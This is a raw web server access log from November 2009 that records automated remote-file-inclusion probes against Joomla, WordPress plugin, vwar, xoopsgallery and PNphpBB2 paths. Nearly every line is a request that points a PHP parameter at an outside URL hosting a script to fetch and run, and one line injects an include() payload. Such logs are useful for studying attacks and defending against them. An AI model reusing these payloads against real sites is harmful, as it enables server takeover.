116.127.121.116 - - [13/Nov/2009:03:40:13 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:13 -0500] "GET /logs/error_log.Q109060900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:13 -0500] "GET /logs/error_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:04 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:13 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:10 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:20 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:20 -0500] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:20 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:36 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:36 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:36 -0500] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:49 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:49 -0500] "GET /logs/error_log.Q109060900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:50 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:53 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:53 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:40:53 -0500] "GET /logs/access_log.Q109070300//vwar/convert/mvcw.php?step=1&vwar_root=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:41:05 -0500] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:41:05 -0500] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:41:05 -0500] "GET /logs/access_log.Q109070300%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:40:49 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:41:08 -0500] "GET /logs/access_log.Q109060200//vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:41:14 -0500] "GET /logs/access_log.Q109060200//vwar/convert/mvcw.php?step=1&vwar_root=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:03:41:20 -0500] "GET /logs/access_log.Q109080200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://ipodbot.fileave.com/id1.txt????????????????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:41:25 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:41:25 -0500] "GET /logs/error_log.Q109060900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:41:25 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:41:32 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:41:32 -0500] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:41:32 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:41:32 -0500] "GET /logs/access_log.Q109060200%20%20//vwar/convert/mvcw.php?step=1&vwar_root=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:41:34 -0500] "GET /logs/access_log.Q109060200//vwar/convert/mvcw.php?step=1&vwar_root=http://toysexviet.com/fx1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:41:25 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:41:43 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:41:43 -0500] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:41:43 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:03:41:47 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.95.231.98 - - [13/Nov/2009:03:42:09 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:42:09 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:42:12 -0500] "GET /logs/error_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:42:09 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:42:18 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:42:18 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:03:42:19 -0500] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:42:23 -0500] "GET /logs/access_log.Q109051900/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:42:24 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
190.95.231.98 - - [13/Nov/2009:03:42:25 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 24069 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:42:45 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:42:45 -0500] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:42:45 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:42:57 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:42:57 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:42:57 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:42:57 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:43:00 -0500] "GET //administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:43:00 -0500] "GET /logs/access_log.Q109063000//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:43:00 -0500] "GET /logs/access_log.Q109081500//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:03:43:00 -0500] "GET /logs//administrator/components/com_moofaq/css/file_includer.php?file=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:43:10 -0500] "GET /?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:43:10 -0500] "GET /logs/access_log.Q109052300/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
157.100.230.82 - - [13/Nov/2009:03:43:10 -0500] "GET /logs/?sourcedir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 200 25806 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:43:22 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:43:22 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:43:26 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:43:29 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:43:48 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:43:48 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:44:17 -0500] "GET /logs/administrator/components/com_moofaq/css/file_includer.php?file=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:03:44:17 -0500] "GET /administrator/components/com_moofaq/css/file_includer.php?file=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:44:21 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:44:21 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:44:21 -0500] "GET /logs/access_log.Q109071900//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:44:33 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:44:33 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:44:33 -0500] "GET /logs/access_log.Q109050900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:45:48 -0500] "GET /logs/access_log.Q109051500/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:45:48 -0500] "GET /?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:45:48 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 200 25806 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:45:49 -0500] "GET /logs/access_log.Q109081400/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
201.218.228.226 - - [13/Nov/2009:03:45:58 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:45:58 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:45:58 -0500] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:45:58 -0500] "GET /logs/access_log.Q109051500/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:45:58 -0500] "GET /?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:45:59 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 200 25806 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:46:00 -0500] "GET /logs/access_log.Q109081400/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:46:04 -0500] "GET /logs/access_log.Q109051500/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:46:04 -0500] "GET /logs/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 200 25806 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:46:04 -0500] "GET /?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:03:46:04 -0500] "GET /logs/access_log.Q109081400/?GALLERY_BASEDIR=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
81.176.229.7 - - [13/Nov/2009:03:46:26 -0500] "GET //?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:46:26 -0500] "GET /logs/access_log.Q109102400%20%20//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.176.229.7 - - [13/Nov/2009:03:46:26 -0500] "GET /logs//?_zb_path=http://www.hackengine.net/scan/id1?? HTTP/1.1" 200 25811 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:46:27 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:46:27 -0500] "GET /logs/access_log.Q109050900//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:03:46:28 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:46:34 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:46:34 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:46:34 -0500] "GET /logs/access_log.Q109071900%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:51 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:51 -0500] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:51 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:51 -0500] "GET /logs/access_log.Q109051900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:53 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:53 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:53 -0500] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:53 -0500] "GET /logs/access_log.Q109051900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:57 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:57 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:57 -0500] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:57 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:57 -0500] "GET /logs/access_log.Q109051900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:57 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:58 -0500] "GET /logs/access_log.Q109081800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
77.221.130.17 - - [13/Nov/2009:03:47:58 -0500] "GET /logs/access_log.Q109051900//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:34 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:34 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:34 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:43 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:43 -0500] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:43 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:46 -0500] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.227.134.140 - - [13/Nov/2009:03:48:53 -0500] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://imtelkom.ac.id/fx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
67.205.103.171 - - [13/Nov/2009:03:50:00 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://demo.helpdesk.nusa.net.id/modules/mod_briaskiss/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:03 -0500] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:03 -0500] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.143.155.52 - - [13/Nov/2009:03:50:03 -0500] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
